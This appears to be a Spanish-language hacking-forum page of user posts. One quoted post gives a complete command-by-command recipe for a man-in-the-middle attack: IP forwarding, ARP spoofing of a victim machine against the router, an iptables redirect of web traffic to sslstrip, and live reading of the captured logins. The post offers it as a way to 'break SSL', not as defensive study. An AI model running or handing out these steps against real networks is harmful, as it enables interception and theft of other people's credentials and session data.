tenia que sacar un manual mas completo sobre karmetasploit eso si que es una obra de arte!pero buen aporte raul100!!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: MauroMasciar en 8 Septiembre 2011, 01:37 AM
Que acaso yo soy el unico que veo caritas en vez del contenido que afirma el titulo del post?
Por que no cerrar esto?
Cita de: SokarTefnut en 7 Marzo 2011, 11:06 AM
Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:
1.- Habilitamos la capacidad para reenvío (routing) del kernel
echo 1 > /proc/sys/net/ipv4/ip_forward
2.- Comenzamos el envenenamiento ARP
(arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
3.- Cambiamos la redireccion de puertos usando las iptables,de esta
manera,estaremos transparentes para la victima,que podrá logearse
sin problemas:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura})
sslstrip -w miarchivo
5.- Abrir otra shell si queremos ver en tiempo real la informacion
tail -f miarchivo